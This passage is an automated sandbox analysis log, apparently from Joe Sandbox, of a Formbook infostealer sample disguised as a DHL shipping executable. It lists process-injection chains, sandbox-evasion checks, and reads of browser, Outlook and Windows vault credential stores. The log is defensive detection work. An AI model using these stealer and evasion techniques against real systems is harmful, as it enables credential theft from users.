Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03943D40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F7D73
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFCF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B9C32
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0392B970 appears 278 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03975130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 039AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 039BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03987E54 appears 102 times
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: String function: 00840A30 appears 46 times
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: String function: 00829CB3 appears 31 times
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: String function: 0083F9F2 appears 40 times
Source: DHL 0737-12182024.exe, 00000000.00000003.2069436154.00000000034F3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs DHL 0737-12182024.exe
Source: DHL 0737-12182024.exe, 00000000.00000003.2070295685.000000000369D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs DHL 0737-12182024.exe
Source: DHL 0737-12182024.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4523238196.0000000002C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4524618858.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2226323346.0000000003710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4526783594.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2225605698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4524568253.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4524627388.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2227031882.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@18/7
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_008937B5 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_008810BF AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_008816C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_008951CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_008AA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_0089648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_008242A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | File created: C:\Users\user\AppData\Local\Temp\aut1CC0.tmp
Source: DHL 0737-12182024.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: netbtugc.exe, 00000004.00000003.2407308495.0000000002E50000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4523547041.0000000002E71000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4523547041.0000000002E7B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4523547041.0000000002E9E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2407308495.0000000002E71000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: DHL 0737-12182024.exe | ReversingLabs: Detection: 57%
Source: unknown | Process created: C:\Users\user\Desktop\DHL 0737-12182024.exe "C:\Users\user\Desktop\DHL 0737-12182024.exe"
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 0737-12182024.exe"
Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 0737-12182024.exe"
Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: DHL 0737-12182024.exe | Static file information: File size 1254400 > 1048576
            Source: DHL 0737-12182024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: DHL 0737-12182024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: DHL 0737-12182024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: DHL 0737-12182024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: DHL 0737-12182024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: DHL 0737-12182024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MPhqOtiHUlL.exe, 00000003.00000002.4524073743.0000000000DCE000.00000002.00000001.01000000.00000004.sdmp, MPhqOtiHUlL.exe, 00000006.00000000.2293045863.0000000000DCE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: DHL 0737-12182024.exe, 00000000.00000003.2072424792.0000000003570000.00000004.00001000.00020000.00000000.sdmp, DHL 0737-12182024.exe, 00000000.00000003.2073603863.00000000033D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2129558471.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226481868.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226481868.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128074509.0000000003500000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2225656804.000000000315B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4524933921.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2228176846.000000000330F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4524933921.000000000365E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DHL 0737-12182024.exe, 00000000.00000003.2072424792.0000000003570000.00000004.00001000.00020000.00000000.sdmp, DHL 0737-12182024.exe, 00000000.00000003.2073603863.00000000033D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2129558471.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226481868.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226481868.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128074509.0000000003500000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2225656804.000000000315B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4524933921.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2228176846.000000000330F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4524933921.000000000365E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.2191743013.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226000633.0000000003200000.00000004.00000020.00020000.00000000.sdmp, MPhqOtiHUlL.exe, 00000003.00000002.4523724213.0000000000868000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4525505296.0000000003AEC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4523547041.0000000002DEE000.00000004.00000020.00020000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2513390369.00000000213FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4525505296.0000000003AEC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4523547041.0000000002DEE000.00000004.00000020.00020000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2513390369.00000000213FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.2191743013.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226000633.0000000003200000.00000004.00000020.00020000.00000000.sdmp, MPhqOtiHUlL.exe, 00000003.00000002.4523724213.0000000000868000.00000004.00000020.00020000.00000000.sdmp
            Source: DHL 0737-12182024.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: DHL 0737-12182024.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: DHL 0737-12182024.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: DHL 0737-12182024.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: DHL 0737-12182024.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_008242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_008242DE
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00840A76 push ecx; ret 0_2_00840A89
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004048A9 push esp; ret 2_2_004048AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E2BA push 00000038h; iretd 2_2_0041E2BE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A436 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418C92 pushad ; retf 2_2_00418C93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A5D9 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004017E5 push ebp; retf 003Fh 2_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403780 push eax; ret 2_2_00403782
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004147A2 push es; iretd 2_2_004147AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039309AD push ecx; mov dword ptr [esp], ecx 2_2_039309B6
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_0083F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_0083F98E
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_008B1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_008B1C41
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | API/Special instruction interceptor: Address: B64EB4
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397096E rdtsc 2_2_0397096E
            Source: C:\Windows\SysWOW64\netbtugc.exe | Window / User API: threadDelayed 9797
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | API coverage: 3.8 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 2924 | Thread sleep count: 175 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 2924 | Thread sleep time: -350000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 2924 | Thread sleep count: 9797 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 2924 | Thread sleep time: -19594000s >= -30000s
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe TID: 6768 | Thread sleep time: -65000s >= -30000s
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe TID: 6768 | Thread sleep count: 35 > 30
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe TID: 6768 | Thread sleep time: -35000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_0088DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0088DBBE
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_0085C2A2 FindFirstFileExW, 0_2_0085C2A2
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_008968EE FindFirstFileW,FindClose, 0_2_008968EE
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_0089698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_0089698F
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_0088D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0088D076
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_0088D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0088D3A9
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00899642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00899642
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_0089979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0089979D
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00899B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00899B2B
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00895C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_00895C97
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_008242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_008242DE
            Source: F56GKLK7U4.4.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: netbtugc.exe, 00000004.00000002.4527634249.0000000007FC9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ansaction PasswordVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: discord.comVMware20,11696428655f
            Source: F56GKLK7U4.4.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: global block list test formVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: netbtugc.exe, 00000004.00000002.4523547041.0000000002DEE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
            Source: netbtugc.exe, 00000004.00000002.4527634249.0000000007FC9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: nara Change Transaction PasswordVMware20,11696428655^
